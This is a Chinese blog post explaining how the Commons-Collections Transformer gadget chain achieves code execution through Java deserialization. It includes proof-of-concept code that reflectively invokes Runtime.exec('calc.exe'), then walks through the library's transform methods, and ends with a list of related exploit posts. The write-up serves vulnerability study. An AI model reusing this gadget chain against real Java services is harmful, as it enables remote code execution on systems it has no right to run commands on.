2. 程式人生 > >java反序列化 - Transformer類可以執行惡意代碼的原理

java反序列化 - Transformer類可以執行惡意代碼的原理

阿新 發佈:2018-08-16
write bject calc == return cal leg invoke stack

java反序列化 - Transformer類可以執行惡意代碼的原理

0x00 代碼

Transformer[] transformers = new Transformer[]{
                  new ConstantTransformer(Runtime.class),
                  new InvokerTransformer("getMethod", new Class[]{String.class,Class[].class},new Object[]{"getRuntime", new Class[0]}),
                  new InvokerTransformer("invoke", new Class[]{Object.class,Object[].class},new Object[]{null, new Object[0]}),
                  new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe",}),
          };
          Transformer transformerChain = new ChainedTransformer(transformers);

          ByteArrayOutputStream out = new ByteArrayOutputStream();
          ObjectOutputStream objOut;

        try {
            objOut = new ObjectOutputStream(out);
            objOut.writeObject(transformerChain);

            transformerChain.transform(null);

        } catch (IOException e) {
            // TODO Auto-generated catch block
            e.printStackTrace();
        }

執行結果:
技術分享圖片

0x01 Transformer類為什麽可以執行惡意代碼?

transformerChain.transform(null); 執行的是:ChainedTransformer類的transform方法

    public Object transform(Object object) {
        for (int i = 0; i < iTransformers.length; i++) {
            object = iTransformers[i].transform(object);
        }
        return object;
    }

object = iTransformers[i].transform(object); 執行的是InvokerTransformer類的transform方法

 public Object transform(Object input) {
        if (input == null) {
            return null;
        }
        try {
            Class cls = input.getClass();
            Method method = cls.getMethod(iMethodName, iParamTypes);
            return method.invoke(input, iArgs);

        } catch (NoSuchMethodException ex) {
            throw new FunctorException("InvokerTransformer: The method ‘" + iMethodName + "‘ on ‘" + input.getClass() + "‘ does not exist");
        } catch (IllegalAccessException ex) {
            throw new FunctorException("InvokerTransformer: The method ‘" + iMethodName + "‘ on ‘" + input.getClass() + "‘ cannot be accessed");
        } catch (InvocationTargetException ex) {
            throw new FunctorException("InvokerTransformer: The method ‘" + iMethodName + "‘ on ‘" + input.getClass() + "‘ threw an exception", ex);
        }
    }

技術分享圖片
通過反射機制調用runtime.class的getMethod方法,繼續調用invoke方法生成了一個runtime的對象,最後執行該對象的exec方法,因此造成了反序列化漏洞。
可以參考:
http://blog.51cto.com/13770310/2159962 的0x03 補充

java反序列化 - Transformer類可以執行惡意代碼的原理

相關推薦

java序列 - Transformer可以執行惡意原理

write bject calc == return cal leg invoke stack java反序列化 - Transformer類可以執行惡意代碼的原理 0x00 代碼 Transformer[] transformers = new Transformer[]

java序列 - transformedMap可以執行惡意原理

clas invoke 序列化 pri [] nag roc map.entry 什麽 java反序列化 - transformedMap類可以執行惡意代碼的原理 0x00 代碼 Map map=new HashMap(); map.put("key","

懸鏡安全丨Java 序列任意程式碼執行漏洞分析與利用

本文首發平臺:懸鏡官網,如需轉載,請聯絡小編,謝謝。        2015年的1月28號,Gabriel Lawrence (@gebl)和Chris Frohoff (@frohoff)在AppSecCali上給出了一個報告[3],報告中介紹了Java反序列化漏洞可以利用Apache Commons

Java RMI遠端序列任意及遠端程式碼執行解析(CVE-2017-3241 )

本打算慢慢寫出來的,但前幾天發現國外有研究員發了一篇關於這個CVE的文章,他和我找到的地方很相似。然而不知道是不是Oracle認為是同一個漏洞然後合併了CVE,還是說我找錯了CVE。 總之,先簡單描述一下漏洞:對於任何一個以物件為引數的RMI介面,你都可以發一個自己構建的物件,迫使伺服器端將這個物件按任

java序列漏洞的檢測

spa div ria comm span Coding python odin ima 1、首先下載常用的工具ysoserial 這邊提供下載地址:https://jitpack.io/com/github/frohoff/ysoserial/master-v0.0.5-

java序列漏洞原理研習

java程序 out import 修改 sed 判斷 pub 發現 commons 零、Java反序列化漏洞   java的安全問題首屈一指的就是反序列化漏洞,可以執行命令啊,甚至直接getshell,所以趁著這個假期好好研究一下java的反序列化漏洞。另外呢,組裏多位大

Java序列漏洞的挖掘、攻擊與防禦

body per 所有 http 操作 www except ride 方法 一、Java反序列化漏洞的挖掘 1、黑盒流量分析: 在Java反序列化傳送的包中,一般有兩種傳送方式,在TCP報文中,一般二進制流方式傳輸,在HTTP報文中,則大多以base64傳輸。因而在流量中

關於metaspolit中進行JAVA序列滲透RMI的原理分析

resp format shel git led 技術 文件 error: return 一、背景: 這裏需要對java反序列化有點了解,在這裏得推廣下自己的博客嘛,雖然寫的不好,廣告還是要做的。原諒我: 1、java反序列化漏洞原理研習 2、java反序列化漏洞的檢測 二

java序列原理-Demo(一)

51cto n) www. fault clas ack 保存 發現 auto java反序列化原理-Demo(一) 0x00 什麽是java序列化和反序列? Java 序列化是指把 Java 對象轉換為字節序列的過程便於保存在內存、文件、數據庫中,ObjectOutput

java序列原理-Demo(二)

mage ins bytearray stream utc 繼承 etc input exceptio java反序列化原理-Demo(二) 0x00 測試代碼以及運行結果 測試代碼: package test; import java.io.ByteArrayInput

第九屆極客大挑戰——怎麼又是江師傅的祕密(java序列

引言:因為太想加入三葉草了,所以極客大挑戰這段時間一直在努力的學習,原來還真沒想到能在比賽中拿到排行榜第一的成績,不過現在看來努力始終都是有回報的。但我依然還是比較菜啊-.-,最近卻有很多夥伴加我好友,一來就叫我大佬,讓我深感有愧-.-,既然都想看我wp,那我就挑幾道題寫寫好了,口拙詞劣還望見諒。

JSON繼承JsonConverter序列序列重寫屬性

首先自定義一個JSON類,繼承JsonConverter,把類的屬性重寫到JSON中. using System; using System.Collections.Generic; using System.Linq; using Sys

Java序列漏洞:在受限環境中從漏洞發現到獲取反向Shell

前言 Java反序列化漏洞可以說是Java安全的一塊心病,近年來更是在安全界“出盡風頭”。其實說到Java反序列化的問題,早在2015年年初的在AppSecCali大會上,兩名安全研究人員Chris Frohoff 和 Gabriel Lawrence發表了一篇題為《Marshallin

Java序列漏洞分析

https://xz.aliyun.com/t/136  寫的挺詳細的,大致瞭解了,整個流程,有點事,之後在細跟 目錄 1. 背景 2. 認識java序列化與反序列化 3. 理解漏洞的產生 4. POC構造 5. 實際漏洞環境測試 6. 總結 背景   2015年11月

java序列Commons-Collections1分析

Commons-Collections1也是利用InvokerTransformer類中的transform方法反射機制執行命令。實驗用的是commons-collections 3.1這裡說一下為什麼呼叫構造elEntry.setValue("hahah");就會彈計算器。poc前一步需要理解如下程式碼:

Java序列之Jackson-databind

這個洞的cve編號:CVE-2017-17485,漏洞環境就如第一個連結那樣,jdk需要在jdk 1.8以上。 先看一下Jackson-databind的用法,說白了就是將json轉換成物件。 test-legit.json程式碼如下 {"id":123} 執行結果如圖: 如果注入的json程式碼如下程

JAVA序列exp及使用方法

這兩天很火的java反序列化漏洞,看到烏雲大牛已經開始刷分,於是找來實踐一波 exp來源 ysoserial 這個專案針對不同的java產品給出了簡單的漏洞利用指令碼. 其中weblogic和jenkins提供python指令碼,但需自己

java序列安全例項解析

什麼是序列化 序列化 (Serialization)將物件的狀態資訊轉換為可以儲存或傳輸的形式的過程。在序列化期間,物件將其當前狀態寫入到臨時或永續性儲存區。以後,可以通過從儲存區中讀取或反序列化物件的狀態,重新建立該物件。 簡單來說: 序列化: 將資料結構或物件轉

JAVA序列漏洞

目錄 反序列化漏洞 序列化和反序列化 JAVA WEB中的序列化和反序列化 物件序列化和反序列範例 JAVA中執行系統命令 重寫readObject()方法 Apache Commons Collections 由於本人並非JAVA程式設計師,所以對JAV

Java 序列時物件包名改變

開發中經常會使用到ObjectInputStream進行物件的反序列化,這時如果物件的包名發生改變,程式就會報java.lang.ClassNotFoundException。在包名不能改變的情況下,我們只能在反序列化時把序列化前的物件強制轉換成當前專案下的物件。這時我們可以